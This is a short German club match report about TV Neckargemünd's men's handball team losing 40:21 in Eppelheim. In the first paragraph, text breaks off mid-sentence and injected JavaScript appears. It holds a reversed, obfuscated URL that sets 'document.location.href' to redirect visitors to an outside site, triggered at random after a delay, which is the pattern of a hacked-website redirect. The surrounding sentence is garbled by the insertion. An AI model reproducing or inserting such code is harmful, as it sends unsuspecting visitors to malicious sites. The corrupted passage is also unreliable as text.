Herren: Klatsche am Nikolaustag

Zum Nikolaus fuhren die ersten Herren des TV Neckargemünd nach Eppelheim und hatten reichlich Geschenke dabei: eine lückenreiche Abwehr, reichlich Fahrkarten und ein paar technische Fehler obendrauf. Die Gastgeber nahmen alles dankend an und verabschiedeten die Gäste feierlich mit zwei Kästen Bier auf ein und dasselbe Kontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to (Tor Nr. 30 und 40 wurden von dem selben Spieler erzielt.) (Tabelle/Ergebnisse)
Neckargemünd, 05.12.15 (ast)- 
Zu beginn starteten 2 Torleute und 8 Feldspieler aus Neckargemünd mit ausreichend Freude und Selbstbewusstsein in ein Spiel, das nicht leicht werden würde. Ansich war aber alles gegeben und hier zumindest eine gute Partie zu spielen. So startete das Spiel auch mit einer 2:0 Führung der Gäste. Leichte Tore aus dem Rückraum.

Die Gastgeber kamen durch schnell ausgeführte Anspiele und Konter zunächst heran und dann auch auf der Überholspur rasch vorbei. Während man zur Halbzeit noch knapp mit 4 Toren zurücklag, verdoppelte sich der Abstand in der zweiten Halbzeit schnell auf 8.

Das Ende vom Lied, war nach dem kompletten Einbruch der Offensive und einer schlicht mangelhaften Abwehrleistung eine wohlverdiente Klatsche: 40:21.

Spielberichtsbogen